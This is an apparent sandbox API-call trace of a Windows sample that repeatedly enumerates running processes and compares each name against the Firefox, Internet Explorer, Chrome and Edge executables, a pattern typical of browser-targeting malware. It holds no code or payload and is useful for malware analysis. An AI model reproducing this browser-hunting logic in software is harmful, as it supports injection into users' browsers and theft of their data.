[0201.103] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0201.104] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0201.104] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0201.104] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0201.104] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0201.105] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0201.105] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0201.105] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0201.105] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0201.105] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0201.105] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0201.105] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0201.105] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.106] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0201.106] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0201.106] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0201.106] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.107] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.107] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.107] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.107] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0201.107] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0201.107] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0201.107] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0201.107] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.108] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.108] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.108] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.108] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0201.108] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0201.108] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0201.108] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0201.108] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.109] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.109] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.109] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.109] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.109] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.110] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.110] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.110] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.110] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0201.110] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0201.110] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0201.110] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0201.110] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.111] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0201.111] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0201.111] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0201.111] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.111] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.111] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.111] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.111] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.112] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.113] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.113] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.113] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.113] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.113] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0201.164] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0201.164] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0201.164] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0201.164] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0201.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.164] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0201.164] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0201.164] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0201.164] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0201.165] CloseHandle (hObject=0xd4) returned 1 [0201.165] Sleep (dwMilliseconds=0x3e8) [0202.242] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0202.245] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.245] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0202.245] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0202.245] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0202.245] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0202.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0202.246] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0202.246] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0202.246] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0202.246] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0202.246] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0202.246] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0202.246] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0202.246] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0202.246] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.246] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.247] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0202.247] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0202.253] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0202.253] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.253] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0202.253] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0202.253] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0202.253] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.254] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0202.254] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0202.254] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0202.254] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.254] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0202.254] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0202.254] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0202.254] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.255] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0202.255] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0202.255] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0202.255] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.256] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0202.256] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0202.256] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0202.256] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0202.256] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0202.256] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0202.256] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0202.256] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.257] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.258] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.259] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.259] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.259] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.259] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0202.260] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0202.260] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0202.260] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0202.260] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.260] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.260] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.260] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.260] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.261] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.261] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.261] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.261] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.261] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0202.261] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0202.261] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0202.261] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.262] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0202.262] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0202.262] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0202.262] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0202.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0202.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0202.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0202.263] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.263] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.263] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.263] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.263] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 